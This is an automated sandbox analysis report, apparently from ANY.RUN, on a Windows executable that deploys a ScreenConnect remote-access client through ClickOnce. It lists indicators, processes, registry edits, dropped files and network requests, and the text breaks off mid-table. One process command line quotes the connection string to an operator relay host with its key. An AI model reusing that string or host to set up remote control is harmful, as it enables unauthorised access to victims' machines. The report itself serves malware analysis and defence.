File name:

SecuriteInfo.com.Riskware.00584baa1.19716.27363

Full analysis: https://app.any.run/tasks/6c1a0fbe-0bf6-47f0-bbbd-48b5c0ec40cc
Verdict: Malicious activity
Analysis date: March 14, 2025, 20:01:58
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
screenconnect
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

D2DDEB332A340115C17A87FCC4BC7CCE

SHA1:

72711A75FBA028566A0AF785339BBF58050D5FDB

SHA256:

4463AF93D719EAE287FBD89CBBADE6848B7D1B23592436AE55C96BF1F531DAA0

SSDEEP:

1536:cflrL5PZVm5c7cwFgnPfdwngb7XCdqQsWQcdnSfqlNKk:crL5RVm5c7cegn3dwgbD+lnSfqv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.WindowsClient.exe (PID: 7564)

  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)
      • dfsvc.exe (PID: 5176)

    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 5176)

    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 5176)

    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
      • ScreenConnect.ClientService.exe (PID: 7660)

    • Reads the date of Windows installation

      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)

    • Executes application which crashes

      • ScreenConnect.ClientService.exe (PID: 7660)
      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)

    • Potential Corporate Privacy Violation

      • ScreenConnect.WindowsClient.exe (PID: 7564)

    • Connects to unusual port

      • ScreenConnect.WindowsClient.exe (PID: 7564)

  • INFO

    • Checks supported languages

      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)
      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
      • ScreenConnect.ClientService.exe (PID: 7660)

    • Reads the machine GUID from the registry

      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)
      • dfsvc.exe (PID: 5176)
      • ScreenConnect.ClientService.exe (PID: 7660)
      • ScreenConnect.WindowsClient.exe (PID: 7564)

    • Reads the computer name

      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)
      • dfsvc.exe (PID: 5176)
      • ScreenConnect.ClientService.exe (PID: 7660)
      • ScreenConnect.WindowsClient.exe (PID: 7564)

    • Reads Environment values

      • dfsvc.exe (PID: 5176)

    • Disables trace logs

      • dfsvc.exe (PID: 5176)

    • Checks proxy server information

      • dfsvc.exe (PID: 5176)

    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 5176)

    • Reads the software policy settings

      • dfsvc.exe (PID: 5176)
      • slui.exe (PID: 5332)

    • Create files in a temporary directory

      • dfsvc.exe (PID: 5176)

    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
      • WerFault.exe (PID: 7884)
      • WerFault.exe (PID: 8140)

    • Process checks computer location settings

      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:12:18 21:38:20+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.4
CodeSize: 40960
InitializedDataSize: 33280
UninitializedDataSize: -
EntryPoint: 0x1489
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
149
Monitored processes
10
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start securiteinfo.com.riskware.00584baa1.19716.27363.exe dfsvc.exe sppextcomobj.exe no specs slui.exe #SCREENCONNECT screenconnect.windowsclient.exe screenconnect.clientservice.exe werfault.exe no specs svchost.exe werfault.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1628C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
5176"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
5256"C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe" C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221225477
Modules
Images
c:\users\admin\appdata\local\temp\securiteinfo.com.riskware.00584baa1.19716.27363.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
5332"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7252C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7564"C:\Users\admin\AppData\Local\Apps\2.0\8BEJBAM1.H5K\B218ZT8B.8XL\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\ScreenConnect.WindowsClient.exe" C:\Users\admin\AppData\Local\Apps\2.0\8BEJBAM1.H5K\B218ZT8B.8XL\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\ScreenConnect.WindowsClient.exe
dfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Exit code:
0
Version:
24.4.4.9118
Modules
Images
c:\users\admin\appdata\local\apps\2.0\8bejbam1.h5k\b218zt8b.8xl\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
7660"C:\Users\admin\AppData\Local\Apps\2.0\8BEJBAM1.H5K\B218ZT8B.8XL\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=listen.onyxaquarius.top&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQB9eol0tmtminnJycWn2qSYOieHyBTVp1d1y1QrZEoI3RWvKJ6BPv8fUNBcM0a2e75xdgPr1lWax4h3%2fFK6Nn8Z%2bB4hbbLxc%2fWmM2jKz9UwR6MlJvynQqQvv5AmQKnNe0KTj9q7fxjc5x4mqY%2bNaT8lz6G%2fAZdcTf8e2UWl%2bz9sxdsSEsX3EYU%2bWT35vvcNr8Y%2f6SvrWj5pUycpP%2bzkIsIHr1HUCDl48PhKHW4jx%2fxGOfQ%2b0F1TwZWvL2QOW011yid3z7ERs3ozSZ94yl2%2bVllVhsjUF2P9KBQdZut7%2bfkldr328RsrKu5yrCEXW6hgNO63z7GLnfBKvGya4xFkVHrC&r=&i=" "5"C:\Users\admin\AppData\Local\Apps\2.0\8BEJBAM1.H5K\B218ZT8B.8XL\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\ScreenConnect.ClientService.exe
ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3762504530
Version:
24.4.4.9118
Modules
Images
c:\users\admin\appdata\local\apps\2.0\8bejbam1.h5k\b218zt8b.8xl\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
7884C:\WINDOWS\SysWOW64\WerFault.exe -u -p 7660 -s 1252C:\Windows\SysWOW64\WerFault.exeScreenConnect.ClientService.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
8140C:\WINDOWS\SysWOW64\WerFault.exe -u -p 5256 -s 232C:\Windows\SysWOW64\WerFault.exeSecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events
12 096
Read events
11 892
Write events
171
Delete events
33

Modification events

(PID) Process:(5256) SecuriteInfo.com.Riskware.00584baa1.19716.27363.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(5256) SecuriteInfo.com.Riskware.00584baa1.19716.27363.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(5256) SecuriteInfo.com.Riskware.00584baa1.19716.27363.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process:(5256) SecuriteInfo.com.Riskware.00584baa1.19716.27363.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation:writeName:Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process:(5176) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
4ODZWAGYH6DV9WA8539AJOYC
(PID) Process:(5176) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
4ODZWAGYH6DV9WA8539AJOYC
(PID) Process:(5176) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(5176) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
8BEJBAM1H5KB218ZT8B8XL0N
(PID) Process:(5176) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
1A20RMZRWVLT6X2NOMH32MAL
(PID) Process:(5176) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
16
Suspicious files
25
Text files
28
Unknown types
0

Dropped files

PID
Process
Filename
Type
5176dfsvc.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
5176dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141binary
MD5:9D1B26309C532142302B58D732CA0566
SHA256:5E5E4E444E9C97CD426E38F12C058C1F597D2E2F6035539BDDEC248527FB3B33
5176dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:E9B50C2AAD344FE31F3357D33C806DB1
SHA256:DCD524D720B801877BF6F1A2F2D1AA885D6E6F0263DB23EBD2722152C4B19DE6
5176dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141binary
MD5:31E19F1B6532E52BE11C982ECAD4AFC7
SHA256:3A780D4D76E0C453B9F9F698A8B0033A9FDB6369E743AA174BE190C380AF2EC8
5176dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.WindowsClient.exe:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
5176dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.WindowsFileManager.exeexecutable
MD5:8531526B6F151A08AD8A551611F686D3
SHA256:A5ECC6FFDA3D32803775EBA060D42212C78BD3E7964BF44408750386B7CFB8F7
5176dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.WindowsClient.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
5176dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.ClientService.exeexecutable
MD5:D3E628C507DC331BAB3DE1178088C978
SHA256:D7D98508730B4384D7E3DCA63A2756D81AF3C54156EFB7B7299004CC2A9B6AB3
5176dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.Windows.dllexecutable
MD5:7099C67FE850D902106C03D07BFB773B
SHA256:2659F660691D65628D2FCC3BFC334686CD053F162CDB73BF7A0DA0AC6449DB92
5176dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.Core.dllexecutable
MD5:665A8C1E8BA78F0953BC87F0521905CC
SHA256:3D016BEF20B3D2425939BFE32BEA6F8C08649399D8BE5A83EB461BC0E0C914EB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
27
DNS requests
17
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.188:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5176
dfsvc.exe
GET
200
23.40.158.218:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
5176
dfsvc.exe
GET
200
23.40.158.218:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
896
backgroundTaskHost.exe
GET
200
23.40.158.218:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6544
svchost.exe
GET
200
23.40.158.218:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5176
dfsvc.exe
GET
200
23.40.158.218:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
whitelisted
7920
SIHClient.exe
GET
200
23.32.97.216:80
